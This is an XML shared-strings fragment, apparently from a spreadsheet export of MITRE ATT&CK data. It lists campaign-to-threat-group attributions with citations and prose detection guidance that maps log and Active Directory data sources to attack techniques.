  <si>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https://attack.mitre.org/techniques/T1653</t>
  </si>
  <si>
    <t>05 June 2023</t>
  </si>
  <si>
    <t xml:space="preserve">Command-line invocation of tools capable of modifying services may be unusual and can be monitored for and alerted on, depending on how systems are typically used in a particular environment. 
</t>
  </si>
  <si>
    <t>Goldstein Menachem, Juan Tapiador</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1654</t>
  </si>
  <si>
    <t>Bilal Bahadır Yenici</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1656</t>
  </si>
  <si>
    <t>08 August 2023</t>
  </si>
  <si>
    <t>Pawel Partyka, Microsoft Threat Intelligence, Blake Strom, Microsoft Threat Intelligence</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</si>
  <si>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public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)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</si>
  <si>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https://attack.mitre.org/techniques/T1657</t>
  </si>
  <si>
    <t>18 August 2023</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft Threat Intelligence, Pawel Partyka, Microsoft Threat Intelligence</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1659</t>
  </si>
  <si>
    <t>01 September 2023</t>
  </si>
  <si>
    <t>initial-access, command-and-control</t>
  </si>
  <si>
    <t>source ID</t>
  </si>
  <si>
    <t>source name</t>
  </si>
  <si>
    <t>source ref</t>
  </si>
  <si>
    <t>source type</t>
  </si>
  <si>
    <t>mapping type</t>
  </si>
  <si>
    <t>target ID</t>
  </si>
  <si>
    <t>target name</t>
  </si>
  <si>
    <t>target ref</t>
  </si>
  <si>
    <t>target type</t>
  </si>
  <si>
    <t>mapping description</t>
  </si>
  <si>
    <t>STIX ID</t>
  </si>
  <si>
    <t>C0028</t>
  </si>
  <si>
    <t>2015 Ukraine Electric Power Attack</t>
  </si>
  <si>
    <t>campaign--46421788-b6e1-4256-b351-f8beffd1afba</t>
  </si>
  <si>
    <t>campaign</t>
  </si>
  <si>
    <t>attributed-to</t>
  </si>
  <si>
    <t>G0034</t>
  </si>
  <si>
    <t>Sandworm Team</t>
  </si>
  <si>
    <t>intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192</t>
  </si>
  <si>
    <t>group</t>
  </si>
  <si>
    <t>(Citation: Andy Greenberg June 2017) (Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--4d407dda-944a-4974-b1c2-0a04d2c9ee4c</t>
  </si>
  <si>
    <t>C0025</t>
  </si>
  <si>
    <t>2016 Ukraine Electric Power Attack</t>
  </si>
  <si>
    <t>campaign--aa73efef-1418-4dbe-b43c-87a498e97234</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Joe Slowik August 2019)</t>
  </si>
  <si>
    <t>relationship--90647f03-38a4-4364-a3af-53640a81360e</t>
  </si>
  <si>
    <t>31 March 2023</t>
  </si>
  <si>
    <t>C0011</t>
  </si>
  <si>
    <t>campaign--b4e5a4a9-f3be-4631-ba8f-da6ebb067fac</t>
  </si>
  <si>
    <t>G0134</t>
  </si>
  <si>
    <t>Transparent Tribe</t>
  </si>
  <si>
    <t>intrusion-set--e44e0985-bc65-4a8f-b578-211c858128e3</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--751e795e-7c1a-4ba1-bb20-636aed025df9</t>
  </si>
  <si>
    <t>C0017</t>
  </si>
  <si>
    <t>campaign--ba6dfa37-f401-4140-88b0-8938f2895e61</t>
  </si>
  <si>
    <t>G0096</t>
  </si>
  <si>
    <t>APT41</t>
  </si>
  <si>
    <t>intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--990a03f8-5813-4fa8-b948-976730d4d285</t>
  </si>
  <si>
    <t>01 December 2022</t>
  </si>
  <si>
    <t>C0027</t>
  </si>
  <si>
    <t>campaign--df74f7ad-b10d-431c-9f1d-a2bc18dadefa</t>
  </si>
  <si>
    <t>G1015</t>
  </si>
  <si>
    <t>Scattered Spider</t>
  </si>
  <si>
    <t>intrusion-set--44d37b89-a739-4810-9111-0d2617a8939b</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--e662ff77-e38c-4a8b-ac49-cfb98ad01b47</t>
  </si>
  <si>
    <t>05 July 2023</t>
  </si>
  <si>
    <t>C0022</t>
  </si>
  <si>
    <t>Operation Dream Job</t>
  </si>
  <si>
    <t>campaign--0257b35b-93ef-4a70-80dd-ad5258e6045b</t>
  </si>
  <si>
    <t>G0032</t>
  </si>
  <si>
    <t>Lazarus Group</t>
  </si>
  <si>
    <t>intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a</t>
  </si>
  <si>
    <t>(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--4b66e057-adbc-498d-99ee-156e0d17bd53</t>
  </si>
  <si>
    <t>17 March 2023</t>
  </si>
  <si>
    <t>C0023</t>
  </si>
  <si>
    <t>Operation Ghost</t>
  </si>
  <si>
    <t>campaign--7854c1a0-f06c-4876-98a4-4bbd34751b05</t>
  </si>
  <si>
    <t>G0016</t>
  </si>
  <si>
    <t>APT29</t>
  </si>
  <si>
    <t>intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542</t>
  </si>
  <si>
    <t>(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--a3adcf1b-a48a-4fab-bc61-5e0b0aeaaca6</t>
  </si>
  <si>
    <t>C0024</t>
  </si>
  <si>
    <t>SolarWinds Compromise</t>
  </si>
  <si>
    <t>campaign--808d6b30-df4e-4341-8248-724da4bac650</t>
  </si>
  <si>
    <t>(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021)(Citation: Mandiant UNC2452 APT29 April 2022)</t>
  </si>
  <si>
    <t>relationship--3b2680f0-aa69-4766-ab41-9123373ffa4e</t>
  </si>
  <si>
    <t>26 March 2023</t>
  </si>
  <si>
    <t>Active DNS</t>
  </si>
  <si>
    <t>x-mitre-data-component--2e521444-7295-4dec-96c1-7595b2df7811</t>
  </si>
  <si>
    <t>datacomponent</t>
  </si>
  <si>
    <t>detects</t>
  </si>
  <si>
    <t>attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2</t>
  </si>
  <si>
    <t>technique</t>
  </si>
  <si>
    <t>Monitor for queried domain name system (DNS) registry data that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>relationship--9afab33c-c230-4cea-9c45-9e0fe7b34587</t>
  </si>
  <si>
    <t>30 March 2022</t>
  </si>
  <si>
    <t>attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9</t>
  </si>
  <si>
    <t>Monitor for queried domain name system (DNS) registry data that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>relationship--7db7e464-272a-4c50-be2b-56586c664f39</t>
  </si>
  <si>
    <t>attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5</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</si>
  <si>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</si>
  <si>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relationship--5c390309-ad95-4015-b1c7-98608750b64e</t>
  </si>
  <si>
    <t>attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3</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</si>
  <si>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</si>
  <si>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relationship--d312fb3f-fd87-48ff-9fba-5c1084a21eab</t>
  </si>
  <si>
    <t>13 July 2022</t>
  </si>
  <si>
    <t>attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba</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</si>
  <si>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</si>
  <si>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relationship--8668965b-801b-4d3d-b797-05a15487de11</t>
  </si>
  <si>
    <t>07 March 2023</t>
  </si>
  <si>
    <t>Active Directory Credential Request</t>
  </si>
  <si>
    <t>x-mitre-data-component--02d090b6-8157-48da-98a2-517f7edd49fc</t>
  </si>
  <si>
    <t>attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b</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</si>
  <si>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</si>
  <si>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relationship--8b22c0bd-784b-4916-8116-709a03be5b45</t>
  </si>
  <si>
    <t>attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1</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</si>
  <si>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</si>
  <si>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relationship--13b3c9ee-6d38-4901-8e41-23200d2860f5</t>
  </si>
  <si>
    <t>28 April 2022</t>
  </si>
  <si>
    <t>attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee</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</si>
  <si>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</si>
  <si>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relationship--6b77c83d-5df6-4d9c-8e29-5f108946574e</t>
  </si>
  <si>
    <t>attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e</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</si>
  <si>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</si>
  <si>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relationship--5a5d0520-7bee-4517-81f0-4710d99ac92b</t>
  </si>
  <si>
    <t>attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926</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</si>
  <si>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</si>
  <si>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relationship--cfd59aac-dca4-4453-89eb-95e6871fe759</t>
  </si>
  <si>
    <t>attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331</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</si>
  <si>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</si>
  <si>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relationship--82c3e1cb-49e6-408b-8227-9fa03e2295f9</t>
  </si>
  <si>
    <t>attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a</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</si>
  <si>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</si>
  <si>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relationship--b5be7685-e717-4775-b636-de6e86423234</t>
  </si>
  <si>
    <t>20 April 2022</t>
  </si>
  <si>
    <t>attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814</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</si>
  <si>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</si>
  <si>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relationship--38401cd8-3fe6-42a2-9f08-dce063afd894</t>
  </si>
  <si>
    <t>Active Directory Object Access</t>
  </si>
  <si>
    <t>x-mitre-data-component--5c6de881-bc70-4070-855a-7a9631a407f7</t>
  </si>
  <si>
    <t>attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163</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</si>
  <si>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</si>
  <si>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relationship--02d6312e-7747-4fb0-b9a4-cb59d9a243f1</t>
  </si>
  <si>
    <t>attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b</t>
  </si>
  <si>
    <t>Monitor for abnormal LDAP queries with filters for &lt;code&gt;groupPolicyContainer&lt;/code&gt; and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.</t>
  </si>
  <si>
    <t>relationship--6a544181-839d-4db6-976b-d36e6eeecb69</t>
  </si>
  <si>
    <t>attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22</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</si>
  <si>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</si>
  <si>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relationship--f3ea1672-9401-41cf-9bad-44ee75763cda</t>
  </si>
  <si>
    <t>attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104</t>
  </si>
  <si>
    <t>relationship--0ca9b943-46b0-4e99-b8b0-2da25abc38dd</t>
  </si>
  <si>
    <t>18 April 2022</t>
  </si>
  <si>
    <t>Active Directory Object Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--18b236d8-7224-488f-9d2f-50076a0f653a</t>
  </si>
  <si>
    <t>attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215</t>
  </si>
  <si>
    <t>Monitor for the registration or joining of new device objects in Active Directory. Raise alerts when new devices are registered or joined without using MFA.(Citation: Microsoft Azure AD Security Operations for Devices)</t>
  </si>
  <si>
    <t>relationship--d9ea911f-2d25-44af-8f23-8f2460ea30ba</t>
  </si>
  <si>
    <t>attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d</t>
  </si>
  <si>
    <t>Monitor for newly constructed active directory objects, such as Windows EID 5137.</t>
  </si>
  <si>
    <t>relationship--23a91a6b-41fa-4202-baaf-3b18128fc518</t>
  </si>
  <si>
    <t>attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee</t>
  </si>
  <si>
    <t>relationship--a9fe98cb-cf51-49b0-b86b-9440ba964f8d</t>
  </si>
  <si>
    <t>attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163</t>
  </si>
  <si>
    <t>relationship--69b0de5e-0135-49a3-a784-fb70559355b6</t>
  </si>
  <si>
    <t>attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a</t>
  </si>
  <si>
    <t>Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects.(Citation: DCShadow Blog)</t>
  </si>
  <si>
    <t>relationship--f5cfe411-18f3-46e6-b8a0-5ea575c5dee7</t>
  </si>
  <si>
    <t>Active Directory Object Deletion</t>
  </si>
  <si>
    <t>x-mitre-data-component--9085a576-636a-455b-91d2-c2921bbe6d1d</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of an active directory object, such as Windows EID 5141.</t>
  </si>
  <si>
    <t>relationship--1484867d-1e7f-488d-a05d-137254c3334d</t>
  </si>
  <si>
    <t>relationship--fef5950e-9bc9-4a5e-a14b-781b1e80dc47</t>
  </si>
  <si>
    <t>Active Directory Object Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db</t>
  </si>
  <si>
    <t>attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48</t>
  </si>
  <si>
    <t>Monitor for changes made to AD settings that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.</t>
  </si>
  <si>
    <t>relationship--ffc0ed92-9331-49c6-bb04-0ed1419c18cb</t>
  </si>
  <si>
    <t>attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0</t>
  </si>
  <si>
    <t>Monitor for changes made to AD settings for unexpected modifications to user accounts, such as deletions or potentially malicious changes to user attributes (credentials, status, etc.).</t>
  </si>
  <si>
    <t>relationship--2ed3f52b-eb91-40a0-9a15-ccce39878f25</t>
  </si>
  <si>
    <t>attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27</t>
  </si>
  <si>
    <t>relationship--467eac5c-0c0b-470b-a1b3-336348639d41</t>
  </si>
  <si>
    <t>attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334</t>
  </si>
  <si>
    <t>Monitor for changes made in the Active Directory that may use scripts automatically executed at boot or logon initialization to establish persistence.</t>
  </si>
  <si>
    <t>relationship--d4c505f2-e265-4b86-882a-7707291e5d24</t>
  </si>
  <si>
    <t>relationship--b141698c-30d9-4d4a-8f3f-683fdf13aa4c</t>
  </si>
  <si>
    <t>Monitor for changes made to AD settings for unexpected modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain.</t>
  </si>
  <si>
    <t>relationship--6e35a13a-3455-4578-8215-9dea6be13cbd</t>
  </si>
  <si>
    <t>attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196</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</si>
  <si>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</si>
  <si>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relationship--9bad5c6c-417e-44ad-9475-cf105eec722b</t>
  </si>
  <si>
    <t>relationship--b16a225f-589e-4884-b408-c5bf3acc1f22</t>
  </si>
  <si>
    <t>attack-pattern--f4c1826f-a322-41cd-9557-562100848c84</t>
  </si>
  <si>
    <t>Monitor for changes made to AD security settings related to MFA logon requirements, such as changes to Azure AD Conditional Access Policies or the registration of new MFA applications.</t>
  </si>
  <si>
    <t>relationship--3b248b79-3ab2-4b60-b1c2-2a072a18696e</t>
  </si>
  <si>
    <t>17 October 2022</t>
  </si>
  <si>
    <t>attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to AD security settings related to MFA logon requirements, such as changes to Azure AD Conditional Access Policies or the registration of new MFA applications. </t>
  </si>
  <si>
    <t>relationship--42f9eb2d-ccc3-4fb3-ad83-4d475fe70397</t>
  </si>
  <si>
    <t>18 July 2022</t>
  </si>
  <si>
    <t>16 September 2022</t>
  </si>
  <si>
    <t>attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99</t>
  </si>
  <si>
    <t>Monitor for changes made in the Active Directory that may use network logon scripts automatically executed at logon initialization to establish persistence.</t>
  </si>
  <si>
    <t>relationship--5a19b582-5176-4f25-81b6-efde178c0b97</t>
  </si>
  <si>
    <t>attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48</t>
  </si>
  <si>
    <t>Monitor property changes in Group Policy: &lt;code&gt;Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\Store passwords using reversible encryption&lt;/code&gt;. By default, the property should be set to Disabled.</t>
  </si>
  <si>
    <t>relationship--079fac5b-c61b-42e4-9ce8-f7fd3b2efe1c</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</si>
  <si>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</si>
  <si>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relationship--493486aa-d53f-48bc-8c2a-3e841a72e5d1</t>
  </si>
  <si>
    <t>attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023</t>
  </si>
  <si>
    <t>Monitor for changes to account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>relationship--1f82ca99-5acd-4a1a-a7ec-96d5cab8bec0</t>
  </si>
  <si>
    <t>Monitor for changes to CA attributes and settings, such as AD CS certificate template modifications (ex: EID 4899/4900 once a potentially malicious certificate is enrolled).(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>relationship--8adae68b-d792-4e92-bd24-94d67eaa566e</t>
  </si>
  <si>
    <t>attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee</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</si>
  <si>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</si>
  <si>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relationship--373cc221-1a32-4188-8366-72851d8647a3</t>
  </si>
  <si>
    <t>Application Log Content</t>
  </si>
  <si>
    <t>x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa</t>
  </si>
  <si>
    <t>attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306</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</si>
  <si>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</si>
  <si>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relationship--b4655ee0-bb6f-4fe3-9427-7cc7e91c61d8</t>
  </si>
  <si>
    <t>attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d</t>
  </si>
  <si>
    <t>Monitor application logs for changes to settings and other events associated with network protocols and other services commonly abused for AiTM.(Citation: dhcp_serv_op_events)</t>
  </si>
  <si>
    <t>relationship--0f04aa6c-82ac-4364-82a0-dda896cffafd</t>
  </si>
  <si>
    <t>attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9</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</si>
  <si>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</si>
  <si>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relationship--93730d1b-d3cb-44f1-be09-654bd2640aef</t>
  </si>
  <si>
    <t>attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0</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</si>
  <si>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</si>
  <si>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relationship--499da978-fa64-469e-901a-0d5db2b8b2f3</t>
  </si>
  <si>
    <t>attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd</t>
  </si>
  <si>
    <t>relationship--cf3093d2-9fd6-4004-a6c8-5c071ba83876</t>
  </si>
  <si>
    <t>19 April 2022</t>
  </si>
  <si>
    <t>attack-pattern--9664ad0e-789e-40ac-82e2-d7b17fbe8fb3</t>
  </si>
  <si>
    <t>Monitor application logs for activity that may highlight malicious attempts to access application data, especially abnormal search activity targeting passwords and other artifacts related to credentials.(Citation: Slack Help Center Access Logs)</t>
  </si>
  <si>
    <t>relationship--dd2236c2-3f6e-492b-bbb5-07b672652378</t>
  </si>
  <si>
    <t>attack-pattern--438c967d-3996-4870-bfc2-3954752a1927</t>
  </si>
  <si>
    <t>In environments using Exchange, monitor logs for the creation or modification of mail processing settings, such as transport rules.</t>
  </si>
  <si>
    <t>relationship--4a05a2c8-9020-4421-9949-a4edf9de701a</t>
  </si>
  <si>
    <t>attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for events collected that may attempt to find cloud groups and permission settings. </t>
  </si>
  <si>
    <t>relationship--1bf86155-186c-4900-96d1-49237f907874</t>
  </si>
  <si>
    <t>attack-pattern--cff94884-3b1c-4987-a70b-6d5643c621c3</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</si>
  <si>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</si>
  <si>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relationship--9837fc51-4144-43f0-a5ae-6c86ae5150ba</t>
  </si>
  <si>
    <t>attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc</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</si>
  <si>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</si>
  <si>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relationship--ecc76c8c-7c95-491d-9d94-1a704fc4995c</t>
  </si>
  <si>
    <t>attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc</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</si>
  <si>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</si>
  <si>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relationship--773f172e-c087-451f-af0d-f3f173736015</t>
  </si>
  <si>
    <t>attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5</t>
  </si>
  <si>
    <t>Monitor Windows logs (ex: EIDs 1341, 1342, 1020, and 1063) for changes to DHCP settings. These may also highlight DHCP issues such as when IP allocations are low or have run out.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)</t>
  </si>
  <si>
    <t>relationship--cb349656-d1d9-4243-afd0-06b404fc8568</t>
  </si>
  <si>
    <t>attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416</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</si>
  <si>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</si>
  <si>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relationship--a54ce63d-df2d-4772-aa87-9f9e7af43473</t>
  </si>
  <si>
    <t>attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391</t>
  </si>
  <si>
    <t>Monitor debugger logs for signs of abnormal and potentially malicious activity.</t>
  </si>
  <si>
    <t>relationship--90e38408-0754-45aa-a406-c3753ce10199</t>
  </si>
  <si>
    <t>11 April 2022</t>
  </si>
  <si>
    <t>attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for third-party application logging, messaging, and/or other artifacts that may modify visual content available internally or externally to an enterprise network. </t>
  </si>
  <si>
    <t>relationship--94475a08-d176-4c4f-872a-88d25333659d</t>
  </si>
  <si>
    <t>attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92</t>
  </si>
  <si>
    <t>Configuration management databases (CMDB) and other asset management systems may help with the detection of computer systems or network devices that should not exist on a network.</t>
  </si>
  <si>
    <t>relationship--65f2522d-4c83-4862-b92b-9385805d54f1</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</si>
  <si>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</si>
  <si>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relationship--9f87d677-5143-4e3f-a2d8-2c90c5cc15bc</t>
  </si>
  <si>
    <t>attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts provided by third-party services that may disable Windows event logging to limit data that can be leveraged for detections and audits.</t>
  </si>
  <si>
    <t>relationship--ccba2fd3-636e-4283-8bd8-792b544df6f5</t>
  </si>
  <si>
    <t>attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6</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</si>
  <si>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</si>
  <si>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relationship--08317a2f-0f32-43be-b6e2-04f02c1d85b3</t>
  </si>
  <si>
    <t>attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f</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</si>
  <si>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</si>
  <si>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relationship--664006e4-dd30-4023-b3a3-659eb6adcd02</t>
  </si>
  <si>
    <t>attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0</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</si>
  <si>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</si>
  <si>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relationship--89bd0965-1256-4725-9b34-29be35fbb879</t>
  </si>
  <si>
    <t>attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff</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</si>
  <si>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</si>
  <si>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relationship--ccf98348-6578-4c88-874a-220de402e3d9</t>
  </si>
  <si>
    <t>attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4</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</si>
  <si>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</si>
  <si>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relationship--2a5472fb-e971-42e2-a6fe-8c1236b8c4b7</t>
  </si>
  <si>
    <t>attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776</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</si>
  <si>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</si>
  <si>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relationship--830bea85-4c12-4bf9-a38d-a6f8d9e88c5c</t>
  </si>
  <si>
    <t>attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807</t>
  </si>
  <si>
    <t>Review logs for SaaS services, including Office 365 and Google Workspace, to detect the configuration of new webhooks or other features that could be abused to exfiltrate data.</t>
  </si>
  <si>
    <t>relationship--d98049fe-a13f-406f-a727-a47bdc296484</t>
  </si>
  <si>
    <t>attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d</t>
  </si>
  <si>
    <t>Review logs for SaaS services, including Office 365 and Google Workspace, to detect the configuration of new webhooks.</t>
  </si>
  <si>
    <t>relationship--12b6a249-fc3d-4e57-9908-373c0553eb03</t>
  </si>
  <si>
    <t>04 August 2023</t>
  </si>
  <si>
    <t>attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c</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</si>
  <si>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</si>
  <si>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relationship--f77bdb5c-55c5-4b90-91d1-27c6dc7e811a</t>
  </si>
  <si>
    <t>attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.</t>
  </si>
  <si>
    <t>relationship--ad468c12-9454-4c78-8cfe-2ac1d3ae2c45</t>
  </si>
  <si>
    <t>attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36</t>
  </si>
  <si>
    <t>relationship--c49b6142-a274-42bb-9e92-fc13ec15400d</t>
  </si>
  <si>
    <t>attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b</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</si>
  <si>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</si>
  <si>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relationship--4e6e0e27-75d3-4ecc-87d8-dba15663ae28</t>
  </si>
  <si>
    <t>attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82</t>
  </si>
  <si>
    <t>relationship--ca63e845-f0dd-4bfe-9b64-b7daa5d5244e</t>
  </si>
  <si>
    <t>attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for third-party application logging, messaging, and/or other artifacts that may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. </t>
  </si>
  <si>
    <t>relationship--1c8df70b-fdbe-4ff4-bfee-a130b61e5df8</t>
  </si>
  <si>
    <t>attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d</t>
  </si>
  <si>
    <t>When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.</t>
  </si>
  <si>
    <t>relationship--ef6c1da8-65d5-47fd-84ab-4d0fa6246c7f</t>
  </si>
  <si>
    <t>attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3</t>
  </si>
  <si>
    <t>Review and monitor financial application logs for signs of financial theft, such as abnormal monetary transactions or resource balances.
Email logs may also highlight account takeovers, impersonation, or another activity that may enable monetary theft.</t>
  </si>
  <si>
    <t>relationship--b4480a33-9011-42d8-a2d9-15748f877bed</t>
  </si>
  <si>
    <t>19 August 2023</t>
  </si>
  <si>
    <t>attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9</t>
  </si>
  <si>
    <t>relationship--f703f9e5-e210-433c-8f09-f20c5a0d00da</t>
  </si>
  <si>
    <t>attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for third-party application logging, messaging, and/or other artifacts that may attempt to hide artifacts associated with their behaviors to evade detection. </t>
  </si>
  <si>
    <t>relationship--4975593a-cae8-46f8-89c1-94d2115dd14c</t>
  </si>
  <si>
    <t>attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f</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</si>
  <si>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</si>
  <si>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relationship--6a649c44-5665-46c9-bd6d-365d2c776782</t>
  </si>
  <si>
    <t>attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada</t>
  </si>
  <si>
    <t>Review and monitor email and other user communication logs for signs of impersonation, such as suspicious emails (e.g., from known malicious or compromised accounts) or content associated with an adversary's actions on objective (e.g., abnormal monetary transactions).</t>
  </si>
  <si>
    <t>relationship--720ca7ba-f9c7-48fd-92c3-e65e187fcce4</t>
  </si>
  <si>
    <t>attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69</t>
  </si>
  <si>
    <t>Monitor logs for abnormal modifications to application settings, such as the creation of malicious Exchange transport rules.</t>
  </si>
  <si>
    <t>relationship--58835dc2-871f-493d-a66d-2ced96a5f7e2</t>
  </si>
  <si>
    <t>attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92</t>
  </si>
  <si>
    <t>relationship--fdf7070e-6d39-4243-a61e-84877a97dcd2</t>
  </si>
  <si>
    <t>attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for third-party application logging, messaging, and/or other artifacts that may deface systems internal to an organization in an attempt to intimidate or mislead users. </t>
  </si>
  <si>
    <t>relationship--7a6a6b83-5a81-4844-96c1-bdd74c047d50</t>
  </si>
  <si>
    <t>attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747</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</si>
  <si>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</si>
  <si>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relationship--6988bc63-8020-44c2-9e38-03370f97e96a</t>
  </si>
  <si>
    <t>attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may rely on a user running a malicious image to facilitate execution.</t>
  </si>
  <si>
    <t>relationship--3a9332d5-befd-4d39-9721-3bad62b374a1</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</si>
  <si>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</si>
  <si>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relationship--09fb9fcf-9bde-49f4-9b8b-ac35e0347c3b</t>
  </si>
  <si>
    <t>attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493</t>
  </si>
  <si>
    <t>Monitor application logs for suspicious events including repeated MFA failures that may indicate user's primary credentials have been compromised.</t>
  </si>
  <si>
    <t>relationship--9900f89a-588c-4892-b8f3-74033ce868d5</t>
  </si>
  <si>
